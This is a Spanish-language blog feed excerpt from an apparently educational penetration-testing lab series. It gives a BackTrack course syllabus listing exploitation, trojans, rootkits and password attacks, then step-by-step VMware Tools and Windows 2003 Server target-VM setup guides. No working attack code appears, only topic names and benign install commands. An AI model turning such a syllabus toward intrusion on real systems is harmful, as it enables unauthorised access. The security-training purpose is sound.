		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Para este nuevo recurso se hacen necesarios los siguiente elementos:</p>
<ol style="text-align: justify;">
<li><a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd" target="_blank">Imágen ISO</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb" target="_blank">LiveCD USB</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm" target="_blank">Appliance</a> de <strong><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">BackTrack</a></strong></li>
<li>Software de virtualización (<a href="http://www.vmware.com/lasp/products/ws/" target="_blank">VMWare WorkStation</a>, <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a>, <a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a>, <a href="http://www.xoftwarelibre.org/virtualbox-ose-software-libre-para-virtualizacion" target="_blank">Virtual BOX</a>, <a href="http://www.xoftwarelibre.org/moka5-virtualizacion-libre-al-instante" target="_blank">MOKA5</a>, etc.)</li>
<li>PC de mediana capacidad.</li>
<li>Conexión a internet (algunos ejercicios, referencias)</li>
</ol>
<p style="text-align: justify;"><span id="more-211"></span><strong>Contenido temático:</strong></p>
<ol style="text-align: justify;">
<li>Conceptos básicos de BackTrack</li>
<li>Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)</li>
<li>Entorno básico Bash</li>
<li>NetCat</li>
<li>Wireshark</li>
<li>Nmap</li>
<li>Técnicas de recolección de información</li>
<li>Recursos Web</li>
<li>Reconocimiento DNS</li>
<li>Reconocimiento SNMP</li>
<li>Reconocimiento SMTP</li>
<li>Recolección de información Microsoft Netbios</li>
<li>Escaneo de puertos</li>
<li>ARP Spoofing</li>
<li>Explotación de Buffer overflow en Windows</li>
<li>Fuzzing</li>
<li>Trabajando con Exploits</li>
<li>Transferencia de archivos</li>
<li>Frameworks de explotación</li>
<li>Ataques del lado del cliente</li>
<li>Redirección</li>
<li>Ataques a contraseñas</li>
<li>Vectores de ataques a aplicaciones Web</li>
<li>Troyanos</li>
<li>NTFS Alternate Data Streams</li>
<li>Rootkits</li>
</ol>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL" target="_blank">SQL Injection</a>, <a href="http://es.wikipedia.org/wiki/Caballo_de_Troya_(inform%C3%A1tica)" target="_blank">Troyanos</a>, <a href="http://www.dragonjar.org/anti-rootkit" target="_blank">RootKits</a>, <a href="http://www.ignaciomarcos.com.ar/index.php/2007/02/27/alternate-data-streams/" target="_blank">NTFS Alternate Data Streams</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Fuerza Bruta</a>, <a href="http://es.wikipedia.org/wiki/Redireccionamiento_de_puertos" target="_blank">Redirección</a>, <a href="http://www.trancek.es/2007/10/fuzzing-brute-force-vulnerability.html" target="_blank">Fuzzing</a>, <a href="http://es.wikipedia.org/wiki/Spoofing" target="_blank">Spoofing</a>, <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a>, <a href="http://es.wikipedia.org/wiki/Bash" target="_blank">Bash</a>, <a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a>.</p>
<p style="text-align: justify;">Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de VMware Tools en BackTrack</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:10:18 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=19</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">En la sesión del laboratorio anterior aprendimos a instalar las VMware Tools en Windows 2003 Server, además conocimos algunas de sus utilidades.<br />
<em><strong><a href="http://www.dragonjar.org/laboratorio-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server.xhtml" target="_blank">Clic para recordar las definiciones</a></strong></em></p>
<p style="text-align: justify;">En esta corta sesión de laboratorio haremos lo mismo, pero para nuestra máquina ocupada por BackTrack.</p>
<p style="text-align: justify;">
<p style="text-align: justify;"><span id="more-19"></span><strong>1 -</strong> Así mismo como en el anterior laboratorio, comenzamos el proceso de instalación de las herramientas desde el propio menú de VMware WorkStation. (Install VMware Tools…).</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/3209/35411266yl3.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/3209/35411266yl3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong></strong></p>
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>2 -</strong> Veremos a continuación el mismo mensaje informátivo y de advertencia sobre el proceso que estamos a punto de realizar.</p>
<p style="text-align: justify;"><a href="http://img402.imageshack.us/img402/8882/28994238fz9.jpg" target="_blank"><img src="http://img402.imageshack.us/img402/8882/28994238fz9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> De esta manera aparecera el nuevo dispositivo que contiene los dos paquetes VMware Tools (VMware Tools-x-x-x.i386.rpm, WMware Tools-x-x-x.tar.gz), donde x-x-x, es el número de la versión instalada de VMware WorkStation. Procedemos entonces a “descomprimir” el paquete WMware Tools-x-x-x.tar.gz, por comodidad lo hice en una carpeta en el escritorio.<br />
Abrimos una shell en esa carpeta y procedemos a ejecutar los siguientes comandos:</p>
<p style="text-align: justify;">Comenzaremos creando algunos soft links de los directorios rc.d, para varios niveles de ejecución necesarios por el script de instalación de las VMware Tools. Para obtener más información sobre estos archivos <a href="http://www.osmosislatina.com/linux/archivos_comunes.jsp" target="_blank"><strong>visita este enlace.</strong></a></p>
<p style="text-align: justify;">Los comandos de ejecución serán los siguientes:</p>
<p style="text-align: justify;">for x in 0 1 2 3 4 5 6<br />
do<br />
ln -s /etc/rc.d/ /etc/rc$x.d<br />
done</p>
<p style="text-align: justify;">Después de esto y como estamos en el mismo directorio contenedor del script instalador, procedemos a su ejecución.</p>
<p style="text-align: justify;"><em>vmware-install.pl</em><strong><em> </em></strong></p>
<p style="text-align: justify;"><a href="http://img503.imageshack.us/img503/3184/57719749lk6.jpg" target="_blank"><img src="http://img503.imageshack.us/img503/3184/57719749lk6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> El proceso posterior a este comando es muy repetitivo, y solo requiere la aprobación de las opciones seleccionadas por defecto, así que podemos continuar mediante la orden ENTER del teclado cuando así lo requiera. Aprovecho para recordar, que cada investigador puede aprovechar las diferentes opciones para profundizar en el tema.</p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/3025/45988293zf4.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/3025/45988293zf4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/3025/45988293zf4.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/3025/45988293zf4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img240.imageshack.us/img240/5067/99782072rc6.jpg" target="_blank"><img src="http://img240.imageshack.us/img240/5067/99782072rc6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> Finalmente concluimos con la instalación de las VMware Tools, debemos ver la siguiente pantalla.</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/5686/55191290qh1.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/5686/55191290qh1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Ahora como en la anterior sesión del laboratorio desarrollaremos el ejercicio de realizar un Drag and Drop entre la máquina host y la invitada.</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/5143/20788328ee3.jpg" target="_blank"><img src="http://img219.imageshack.us/img219/5143/20788328ee3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 -</strong> Arrastramos y soltamos el archivo al escritorio de BackTrack.</p>
<p style="text-align: justify;"><a href="http://img250.imageshack.us/img250/8871/59816899mt0.jpg" target="_blank"><img src="http://img250.imageshack.us/img250/8871/59816899mt0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img259.imageshack.us/img259/5387/10yf1.jpg" target="_blank"><img src="http://img259.imageshack.us/img259/5387/10yf1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>8 -</strong> Archivo transferido a nuestra máquina BackTrack.</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/4097/11wk4.jpg" target="_blank"><img src="http://img219.imageshack.us/img219/4097/11wk4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la cuarta sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Instalación de las VMware Tools en la máquina virtual ocupada por BackTrack.<br />
- Transferencia de archivos mediante Drag and Drop.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Identificación de Banner’s.</p>
<p style="text-align: justify;"><strong>Taller libre:</strong><br />
Instalar otro S.O en una nueva máquina virtual. (El Sistema Operativo puede ser de libre selección) En lo posible enviar algunas capturas e instrucciones del proceso que se llevó a cabo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-backtrack/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de VMware Tools en Windows 2003 Server</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:07:45 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=17</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">En la tercera sesión aprenderemos como instalar las VMware tools. Herramientas del aplicativo Software de virtualización destinadas al mejoramiento de VMware WorkStation.</p>
<p style="text-align: justify;"><strong>VMware Tools:</strong> Principalmente permiten una interacción más dinámica entre las máquinas host (anfitrion-Win XP) y guest (invitadas-Win2003, Backtrack), ofreciendo de manera simple la posibilidad de compartir archivos y carpetas, realizar drag and drops de archivos, cambios de configuración de pantalla, aceleración de dispositivos y demás.</p>
<p style="text-align: justify;"><span id="more-17"></span>Una definición más técnica es la siguiente:</p>
<p style="text-align: justify;">Se trata de software nativo específico para el sistema que corre sobre VMware, con el propósito principal de acelerar su rendimiento haciendo de puente entre el sistema emulado y el sistema operativo anfitrión sobre el que corre VMware, pero también implementa funcionalidades como cortar y pegar entre el sistema operativo emulado y el que ejecuta Vmware. Por ejemplo, con ayuda de código específico que corre sobre el sistema emulado se puede mejorar la velocidad del vídeo. En lugar de traducir las primitivas gráficas de alto nivel OpenGL a las más básicas de la tarjeta de vídeo emulada, un controlador de vídeo modificado puede utilizar el API gráfico de la máquina nativa.<br />
<a href="http://www.vnunet.es/Laboratorio/Microconsultas/Inform%C3%A1tica_personal/Linux/20051221012" target="_blank"><em><strong>Fuente</strong></em></a></p>
<p style="text-align: justify;">
<p style="text-align: justify;">Pasemos de esta manera a la instalación de las VMware Tools en la máquina virtual que corre Windows 2003 Server.</p>
<p style="text-align: justify;"><strong>1 -</strong> Ejecutamos la máquina virtual que contiene a Windows 2003 Server, después de iniciar vamos al menu superior de la herramienta VMware Workstation, desde allí ejecutamos el instalador de las VMware tools</p>
<p style="text-align: justify;"><a href="http://img186.imageshack.us/img186/3209/35411266yl3.jpg" target="_blank"><img src="http://img186.imageshack.us/img186/3209/35411266yl3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>2 -</strong> Recibimos un mensaje informátivo acerca de los beneficios del uso de las VMware Tools, además de una advertencia sobre el estado en el cual debe estar la máquina virtual para poder instalar las herramientas, para el caso, debe estar encendida.</p>
<p style="text-align: justify;"><a href="http://img236.imageshack.us/img236/7792/26582061jb7.jpg" target="_blank"><img src="http://img236.imageshack.us/img236/7792/26582061jb7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> Paso siguiente se ejecutará el asistente de instalación de las VMware Tools para Windows, clic en siguiente.</p>
<p style="text-align: justify;"><a href="http://img413.imageshack.us/img413/5835/69618720da5.jpg" target="_blank"><img src="http://img413.imageshack.us/img413/5835/69618720da5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> Seleccionamos a continuación el tipo de instalación. Tenemos tres opciones de selección, típica, completa y personalizada. Para esta sesión utilizaremos <strong>Completa.</strong></p>
<p style="text-align: justify;"><a href="http://img405.imageshack.us/img405/1012/67906225tv4.jpg" target="_blank"><img src="http://img405.imageshack.us/img405/1012/67906225tv4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> Procedemos entonces a dar clic en Install para comenzar.</p>
<p style="text-align: justify;"><a href="http://img410.imageshack.us/img410/6186/83673523am6.jpg" target="_blank"><img src="http://img410.imageshack.us/img410/6186/83673523am6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Progreso de instalación de las VMware Tools.</p>
<p style="text-align: justify;"><a href="http://img443.imageshack.us/img443/7720/36108379sx9.jpg" target="_blank"><img src="http://img443.imageshack.us/img443/7720/36108379sx9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 -</strong> Si nuestro hardware de aceleración no esta activado recibiremos el siguiente mensaje, además de la opción de activarlo, de lo contrario no aparecerá.</p>
<p style="text-align: justify;"><a href="http://img227.imageshack.us/img227/7982/31016947qk5.jpg" target="_blank"><img src="http://img227.imageshack.us/img227/7982/31016947qk5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>8 -</strong> Proceso de instalación completado.</p>
<p style="text-align: justify;"><a href="http://img219.imageshack.us/img219/2343/60081817mu8.jpg" target="_blank"><img src="http://img219.imageshack.us/img219/2343/60081817mu8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>9 -</strong> Ahora es necesario reiniciar la máquina, damos clic en Yes.</p>
<p style="text-align: justify;"><a href="http://img225.imageshack.us/img225/3714/17298070gt5.jpg" target="_blank"><img src="http://img225.imageshack.us/img225/3714/17298070gt5.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>10 -</strong> Después de reiniciar la máquina veremos en nuestra barra de tareas el icon-tray de las VMWare Tools.</p>
<p style="text-align: justify;"><a href="http://img509.imageshack.us/img509/7376/10tf8.jpg" target="_blank"><img src="http://img509.imageshack.us/img509/7376/10tf8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>11 -</strong> Haciendo doble clic sobre el icono podemos observar la totalidad de opciones de las herramientas instaladas. Para este caso solo mostraré las capturas de pantalla, dejando la explicación de cada una de estas opciones para otra sesión, a medida que se haga necesaria la utilización de las mismas.</p>
<p style="text-align: justify;"><a href="http://img77.imageshack.us/img77/3460/11bv7.jpg" target="_blank"><img src="http://img77.imageshack.us/img77/3460/11bv7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/8003/12ta0.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/8003/12ta0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img441.imageshack.us/img441/6190/13mj4.jpg" target="_blank"><img src="http://img441.imageshack.us/img441/6190/13mj4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img337.imageshack.us/img337/2431/14pi1.jpg" target="_blank"><img src="http://img337.imageshack.us/img337/2431/14pi1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img258.imageshack.us/img258/8520/15nl4.jpg" target="_blank"><img src="http://img258.imageshack.us/img258/8520/15nl4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img231.imageshack.us/img231/1796/16sz0.jpg" target="_blank"><img src="http://img231.imageshack.us/img231/1796/16sz0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>12 -</strong> Una de las posibilidades más llamativas después de instalar las VMware, es la facilidad de intercambiar o transmitir datos entre las máquinas. Con un simple (Drag and Drop &#8211; arrastrar y soltar) podemos subir o bajar archivos entre nuestras máquinas virtuales. A continuación una secuencia de esta utilidad, en la cual arrastraré una carpeta que contiene un pequeño servidor Web-Mail-FTP portable, desde la máquina host (windows XP), a la máquina guest (Windows 2003 Server Enterprise Edition).</p>
<p style="text-align: justify;"><a href="http://img211.imageshack.us/img211/848/17qv9.jpg" target="_blank"><img src="http://img211.imageshack.us/img211/848/17qv9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>13 -</strong> Carpeta a transferir mediante Drag and drop simple.</p>
<p style="text-align: justify;"><a href="http://img211.imageshack.us/img211/7149/18gg7.jpg" target="_blank"><img src="http://img211.imageshack.us/img211/7149/18gg7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>14 -</strong> Arrastrar y soltar.</p>
<p style="text-align: justify;"><a href="http://img337.imageshack.us/img337/8578/19ti2.jpg" target="_blank"><img src="http://img337.imageshack.us/img337/8578/19ti2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img252.imageshack.us/img252/6495/20ac2.jpg" target="_blank"><img src="http://img252.imageshack.us/img252/6495/20ac2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>15 -</strong> Contenido de la carpeta visualizado desde Windows 2003 Server.</p>
<p style="text-align: justify;"><a href="http://img208.imageshack.us/img208/5803/21dl2.jpg" target="_blank"><img src="http://img208.imageshack.us/img208/5803/21dl2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">Termina de esta manera la tercera sesión laboratorio, hagamos un recuento de lo aprendido.</p>
<p style="text-align: justify;">- Definición del concepto VMware Tools.<br />
- Instalación de las VMware Tools en la máquina virtual ocupada por Windows 2003 Server.<br />
- Transferencia de archivos mediante Drag and Drop.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong><br />
Instalación de las VMware Tools en BackTrack.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Instalación de máquinas virtuales II</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-ii</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-ii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:04:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=15</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Veremos ahora como crear una máquina virtual, con el fin de instalar en ella el <strong><a href="http://es.wikipedia.org/wiki/Sistema_operativo" target="_blank">S.O</a></strong> <strong><a href="http://www.microsoft.com/latam/windowsserver2003/evaluation/overview/enterprise.mspx" target="_blank">Windows 2003 Server Edición Enterprise</a></strong>. Sistema que actuará en gran medida en las sesiones de laboratorio como máquina objetivo.</p>
<p style="text-align: justify;"><strong>Requisitos:</strong> VMware WorkStation (Software ya instalado en la anterior sesión).<br />
Imagen o CD de instalación del S.O <a href="http://www.microsoft.com/latam/windowsserver2003/evaluation/overview/enterprise.mspx" target="_blank"><strong>Windows 2003 Server</strong></a>.</p>
<p style="text-align: justify;"><span id="more-15"></span><strong>1 -</strong> Después de iniciar el aplicativo VMware WorkStation desde cualquiera de los accesos creados en el proceso de instalación crearemos una nueva máquina virtual.</p>
<p style="text-align: justify;"><a href="http://img75.imageshack.us/img75/9733/64419167vu2.jpg" target="_blank"><img src="http://img75.imageshack.us/img75/9733/64419167vu2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;">
<p style="text-align: justify;"><strong>2 -</strong> Clic en el botón siguiente.</p>
<p style="text-align: justify;"><a href="http://img257.imageshack.us/img257/3774/54356524jt1.jpg" target="_blank"><img src="http://img257.imageshack.us/img257/3774/54356524jt1.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>3 -</strong> La configuración de esta máquina virtual, al igual que la de BackTrack se hará de una manera típica, así mismo como en la anterior sesión del laboratorio invito a los investigadores a profundizar en las demás opciones disponibles por el aplicativo. Para esto pueden estudiar la información disponible sobre el mismo en la red.<br />
<a href="http://www.vmware.com/es/" target="_blank"><strong>VMware en español</strong></a><br />
<a href="http://es.wikipedia.org/wiki/VMware" target="_blank"><strong>Wikipedia</strong></a><br />
<a href="http://www.aprendervmware.educaleft.com/" target="_blank"><strong>VideoTutoriales de VMware</strong></a></p>
<p style="text-align: justify;"><a href="http://img120.imageshack.us/img120/7744/20717143st7.jpg" target="_blank"><img src="http://img120.imageshack.us/img120/7744/20717143st7.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>4 -</strong> Luego de dar clic en siguiente seleccionaremos el S.O a instalar, en este caso Windows, en su versión Windows 2003 Server Enterprise Edition.</p>
<p style="text-align: justify;"><a href="http://img228.imageshack.us/img228/1553/68889404fu3.jpg" target="_blank"><img src="http://img228.imageshack.us/img228/1553/68889404fu3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>5 -</strong> Asignamos el nombre a la nueva máquina virtual, al igual que su localización.</p>
<p style="text-align: justify;"><a href="http://img505.imageshack.us/img505/774/11521554qd9.jpg" target="_blank"><img src="http://img505.imageshack.us/img505/774/11521554qd9.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>6 -</strong> Como en la sesión anterior, utilizaremos el tipo de conexión usando <a href="http://es.wikipedia.org/wiki/Network_Address_Translation" target="_blank"><strong>Network Address Translation</strong></a>.</p>
<p style="text-align: justify;"><a href="http://img76.imageshack.us/img76/4694/88030915xl4.jpg" target="_blank"><img src="http://img76.imageshack.us/img76/4694/88030915xl4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>7 -</strong> El tamaño seleccionado para el disco duro de el S.O Windows 2003 Server será de 8 GB. Puede ser mayor o menor, según la capacidad de tu disco duro real. (como mínimo recomiendo 5 o 6 GB).</p>
<p style="text-align: justify;"><a href="http://img512.imageshack.us/img512/7455/41754821ks8.jpg" target="_blank"><img src="http://img512.imageshack.us/img512/7455/41754821ks8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>8 -</strong> De esta manera ha sido creada nuestra segunda máquina virtual, ésta con la finalidad de almacenar a Windows 2003 Server.</p>
<p style="text-align: justify;"><a href="http://img120.imageshack.us/img120/407/40834822bd2.jpg" target="_blank"><img src="http://img120.imageshack.us/img120/407/40834822bd2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>9 -</strong> Pasemos entonces a instalar Windows 2003 Server.<br />
Deben recordar que desde la pantalla anterior es posible editar la configuración actual de la nueva máquina, es decir, aumentar el tamaño de <a href="http://es.wikipedia.org/wiki/Memoria_RAM" target="_blank"><strong>memoria RAM</strong></a>, unidades de CD y demás.<br />
Después de tener el CD de instalación de Windows 2003 Server en la unidad de CD, podemos dar la orden de arranque de nuestra máquina virtual.</p>
<p style="text-align: justify;">El proceso de instalación de Windows 2003 Server no presenta mayores diferencias al proceso de instalación de Windows XP Professional o Home Edition, salvo alguna que otra pantalla diferente.</p>
<p style="text-align: justify;">Pasemos a la pantalla de bienvenida.</p>
<p style="text-align: justify;"><a href="http://img76.imageshack.us/img76/2019/39864981as0.jpg" target="_blank"><img src="http://img76.imageshack.us/img76/2019/39864981as0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>10 -</strong> Aceptamos el contrato de Licencia de Windows con la tecla F8. Cabe recordar que algunas versiones de Windows 2003 Server pueden ser adquiridas por un periodo de prueba no mayor a 180 días. Utilizar versiones no legales de este Sistema Operativo infringe las leyes. Así que es bajo tu propia cuenta y riesgo la utilización de licencias no legales.</p>
<p style="text-align: justify;"><a href="http://img443.imageshack.us/img443/3966/10op0.jpg" target="_blank"><img src="http://img443.imageshack.us/img443/3966/10op0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>11 -</strong> Ahora nos muestra las particiones existentes, como ésta es una instalación en limpio no tenemos ninguna partición creada. Damos <strong>ENTER</strong> para crear la nueva partición.</p>
<p style="text-align: justify;"><a href="http://img101.imageshack.us/img101/6421/11tx0.jpg" target="_blank"><img src="http://img101.imageshack.us/img101/6421/11tx0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>12 -</strong> Procedemos ahora a formatear la nueva partición creada en el paso anterior, para este efecto utilizaremos el sistema de archivos <a href="http://es.wikipedia.org/wiki/New_Technology_File_System" target="_blank"><strong>NTFS</strong></a> (rápido) .</p>
<p style="text-align: justify;"><a href="http://img54.imageshack.us/img54/1277/12yi2.jpg" target="_blank"><img src="http://img54.imageshack.us/img54/1277/12yi2.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>13 -</strong> Esperamos mientras el programa formatea la nueva partición.</p>
<p style="text-align: justify;"><a href="http://img68.imageshack.us/img68/7922/13gp6.jpg" target="_blank"><img src="http://img68.imageshack.us/img68/7922/13gp6.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>14 -</strong> Luego de formatear comienza el proceso de copia de archivos desde el CD a nuestro disco duro.</p>
<p style="text-align: justify;"><a href="http://img166.imageshack.us/img166/2213/14ln4.jpg" target="_blank"><img src="http://img166.imageshack.us/img166/2213/14ln4.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>15 -</strong> Pantalla de progreso de instalación. Además nos ofrece información sobre el producto.</p>
<p style="text-align: justify;"><a href="http://img444.imageshack.us/img444/7821/15ru8.jpg" target="_blank"><img src="http://img444.imageshack.us/img444/7821/15ru8.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>16 -</strong> Pasamos a la configuración regional y de idioma.</p>
<p style="text-align: justify;"><a href="http://img54.imageshack.us/img54/18/16ko0.jpg" target="_blank"><img src="http://img54.imageshack.us/img54/18/16ko0.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>17 -</strong> Personalización de software &#8211; Nombre del sistema u organización.</p>
<p style="text-align: justify;"><a href="http://img234.imageshack.us/img234/1043/17qv3.th.jpg" target="_blank"><img src="http://img234.imageshack.us/img234/1043/17qv3.th.jpg" border="0" alt="" /></a></p>
<p style="text-align: justify;"><strong>18 -</strong> En este paso debemos ingresar el número de serie adquirido con Microsoft Corp. Si la versión instalada es un trial de 180 días debemos ingresar el serial que nos fué enviado por correo electrónico.</p>
